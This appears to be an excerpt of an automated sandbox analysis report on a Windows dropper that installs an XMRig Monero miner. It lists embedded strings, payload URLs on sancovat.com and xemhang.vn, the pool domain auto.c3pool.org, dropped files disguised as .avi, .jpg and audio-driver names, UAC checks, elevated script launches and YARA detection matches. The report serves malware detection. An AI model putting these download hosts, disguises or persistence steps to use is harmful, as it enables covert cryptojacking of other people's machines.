                            Source: Binary string: aeroadmin.pdb source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr
                            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.dr
                            Source: Binary string: aeroadmin.pdbXu source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2150416482.0000000002D34000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2150416482.0000000002D34000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.000000000041A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
                            Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.000000000041A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                            Source: K4gsPJGEi4.exeBinary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
                            Source: K4gsPJGEi4.exeBinary or memory string: [autorun]
                            Source: cmdow.exe0.15.drBinary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
                            Source: cmdow.exe0.15.drBinary or memory string: [autorun]
                            Source: cmdow.exe.15.drBinary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
                            Source: cmdow.exe.15.drBinary or memory string: [autorun]
                            Source: cm.avi.15.drBinary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
                            Source: cm.avi.15.drBinary or memory string: [autorun]
                            Source: cmdo.jpg.15.drBinary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
                            Source: cmdo.jpg.15.drBinary or memory string: [autorun]
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_004024C1 FindFirstFileA,FindNextFileA,FindClose,18_2_004024C1
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_004030D0 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_004030D0
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficDNS traffic detected: DNS query: auth11.aeroadmin.com
                            Source: global trafficDNS traffic detected: DNS query: auto.c3pool.org
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://900100.net
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                            Source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                            Source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                            Source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                            Source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                            Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://nircmd.nirsoft.net
                            Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://nircmd.nirsoft.net/%s.html
                            Source: screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://nircmd.nirsoft.net/%s.htmlhttp://nircmd.nirsoft.net
                            Source: K4gsPJGEi4.exe, RuntimeBroker.exe.0.drString found in binary or memory: http://nssm.cc/h
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drString found in binary or memory: http://sancovat.com/Website1/All/FixT3N24.txt
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drString found in binary or memory: http://sancovat.com/Website1/All/recoverview.txt
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: http://www.aeroadmin.com/warning_btn_buylimit_titleback_warning_buy/index.html?src=aa_/buy.html?src=
                            Source: K4gsPJGEi4.exe, cmdow.exe0.15.dr, cmdow.exe.15.dr, cm.avi.15.dr, cmdo.jpg.15.drString found in binary or memory: http://www.commandline.co.uk.
                            Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.nirsoft.net
                            Source: screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.nirsoft.netopenIf
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drString found in binary or memory: http://xemhang.vn/Website1/All/FixT3N24.txt
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drString found in binary or memory: http://xemhang.vn/Website1/All/recoverdv.txt
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drString found in binary or memory: http://xemhang.vn/Website1/All/recoverview.txt
                            Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drString found in binary or memory: https://ulm.aeroadmin.com/build_numberCould
                            Source: In.avi.15.drString found in binary or memory: https://www.globalsign.com/repository/0
                            Source: K4gsPJGEi4.exe, RtkAudio.txt.0.drString found in binary or memory: https://xmrig.com/benchmark/%s
                            Source: K4gsPJGEi4.exe, RtkAudio.txt.0.drString found in binary or memory: https://xmrig.com/docs/algorithms
                            Source: K4gsPJGEi4.exe, RtkAudio.txt.0.drString found in binary or memory: https://xmrig.com/wizard
                            Source: K4gsPJGEi4.exe, RtkAudio.txt.0.drString found in binary or memory: https://xmrig.com/wizard%s
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00402057 GetObjectA,GetDC,CreateDIBitmap,ReleaseDC,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteObject,18_2_00402057
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00402057 GetObjectA,GetDC,CreateDIBitmap,ReleaseDC,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteObject,18_2_00402057
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_004018A1 memset,OpenClipboard,EmptyClipboard,RegisterClipboardFormatA,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,CloseHandle,18_2_004018A1
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00402D57 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_00402D57
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00402CB5 GetClipboardData,GlobalFix,CreateFileA,SetFilePointer,CloseHandle,GlobalUnWire,CloseClipboard,18_2_00402CB5
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_0040D139 GetDC,GetDeviceCaps,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,atoi,atoi,atoi,atoi,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,BitBlt,_strcmpi,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SelectObject,DeleteDC,SelectObject,DeleteDC,DeleteObject,ReleaseDC,18_2_0040D139

                            System Summary

                            barindex
                            Source: K4gsPJGEi4.exe, type: SAMPLEMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: K4gsPJGEi4.exe, type: SAMPLEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: K4gsPJGEi4.exe, type: SAMPLEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: K4gsPJGEi4.exe, type: SAMPLEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.raw.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: 0.0.K4gsPJGEi4.exe.8bc490.2.raw.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: 0.0.K4gsPJGEi4.exe.7b66bc.1.raw.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: 00000000.00000003.2159430929.0000000002EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: 00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: Process Memory Space: K4gsPJGEi4.exe PID: 3652, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: C:\Windows\SysWOW64\cmd.exeDropped file: Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\est1.cmd", , , "runas", 0Jump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped file: Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\two.cmd", , , "runas", 0Jump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped file: Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\stwinvr.cmd", , , "runas", 0Jump to dropped file
                            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00405118 PostQuitMessage,PostQuitMessage,PostQuitMessage,NtdllDefWindowProc_A,18_2_00405118
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_0040AC8D: CloseHandle,atoi,atoi,atoi,DeviceIoControl,18_2_0040AC8D
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\WinRing0x64.sysJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\V_Test1.txtJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\In.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\aatem.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\aapub.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\sc.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\cm.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Sy.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\RuntimeBroker.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Au.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Ri.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\co2.aviJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\co1.aviJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: String function: 00410900 appears 61 times
                            Source: K4gsPJGEi4.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                            Source: K4gsPJGEi4.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: K4gsPJGEi4.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: K4gsPJGEi4.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386, for MS Windows
                            Source: K4gsPJGEi4.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386, for MS Windows
                            Source: K4gsPJGEi4.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (native) x86-64, for MS Windows
                            Source: K4gsPJGEi4.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                            Source: Sy.avi.15.drStatic PE information: Number of sections : 16 > 10
                            Source: Systemfo.jpg.15.drStatic PE information: Number of sections : 16 > 10
                            Source: RtkAudio.exe.15.drStatic PE information: Number of sections : 11 > 10
                            Source: RtkAudio.txt.0.drStatic PE information: Number of sections : 11 > 10
                            Source: Systemfont.exe.15.drStatic PE information: Number of sections : 16 > 10
                            Source: RtkAudio.exe0.15.drStatic PE information: Number of sections : 11 > 10
                            Source: Au.avi.15.drStatic PE information: Number of sections : 11 > 10
                            Source: Systemfont.txt.0.drStatic PE information: Number of sections : 16 > 10
                            Source: Aud.jpg.15.drStatic PE information: Number of sections : 11 > 10
                            Source: RtkAudio.exe1.15.drStatic PE information: Number of sections : 11 > 10
                            Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.000000000073A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIntelSvc.exe4 vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2151315509.000000000319B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIntelSvc.exe4 vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.0000000001099000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAudio.exe, vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.0000000003679000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudio.exe, vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.000000000041A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNirCmd.exe. vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2150317794.0000000002D34000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNirCmd.exe. vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exeBinary or memory string: OriginalFilenameNirCmd.exe. vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exeBinary or memory string: OriginalFilenameIntelSvc.exe4 vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exeBinary or memory string: OriginalFilenameWinRing0.sys2 vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exeBinary or memory string: OriginalFilenameAudio.exe, vs K4gsPJGEi4.exe
                            Source: K4gsPJGEi4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                            Source: Yara matchFile source: 18.2.screen.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.screen.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: screen.exe PID: 6668, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: screen.exe PID: 4128, type: MEMORYSTR
                            Source: K4gsPJGEi4.exe, type: SAMPLEMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: K4gsPJGEi4.exe, type: SAMPLEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: K4gsPJGEi4.exe, type: SAMPLEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: K4gsPJGEi4.exe, type: SAMPLEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.raw.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: 0.0.K4gsPJGEi4.exe.8bc490.2.raw.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: 0.0.K4gsPJGEi4.exe.7b66bc.1.raw.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
